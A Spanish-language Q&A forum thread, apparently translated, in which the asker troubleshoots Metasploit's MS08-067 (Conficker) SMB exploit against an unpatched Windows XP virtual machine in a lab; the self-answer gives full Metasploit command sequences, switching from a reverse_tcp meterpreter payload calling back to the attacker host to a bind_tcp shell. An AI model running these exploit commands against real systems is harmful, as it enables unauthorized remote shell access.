Use Metasploit para explotar SMB a través de Conficker

1

Tengo un SP0 / Windows XP sin parche que es vulnerable al gusano Conficker. Estoy usando metasploit para usar el exploit de Conficker con el propósito de abrir una línea de comando / shell remota.

Mi script Metasploit es el siguiente:

use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z

En mi caso, tengo máquinas con direcciones en 192.168.239.* y LPORT = 443 .

De esta manera, debería poder abrir una sesión con la máquina remota vulnerable ( sessions -i 1 ), ejecutando así la aplicación de línea de comandos ( execute -i -f cmd.exe ) y obteniendo una línea de comandos remota.

Sin embargo, cuando ejecuto el guión, aunque obtengo que Meterpreter abre una sesión con la víctima, esta sesión se cierra (Razón: murió) después de unos segundos.

Encontré que podría estar relacionado con el hecho de que estoy usando dos máquinas virtuales VMWare durante mi prueba .
Como se sugirió, lo intenté con set InitialAutoRunScript migrate -f , pero nada cambia.

¿Cómo puedo evitar que se cierren las sesiones de Meterpreter?
Y, lo más importante, ¿por qué están cerrados?

    
pregunta auino 17.12.2013 - 11:25
fuente

1 respuesta

1

He resuelto variando la carga útil utilizada por Metasploit. En particular, al usar bind_tcp payload, las conexiones de Meterpreter ya no se cierran después de unos segundos, y obtengo una línea de comando / shell remota.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp
set RHOST <vulnerable_win_xp_ip>
show targets
set TARGET <n>
run

En mi caso <n> = 2 , pero en general depende del paso anterior.

    
respondido por el auino 18.12.2013 - 16:59
fuente

Lea otras preguntas en las etiquetas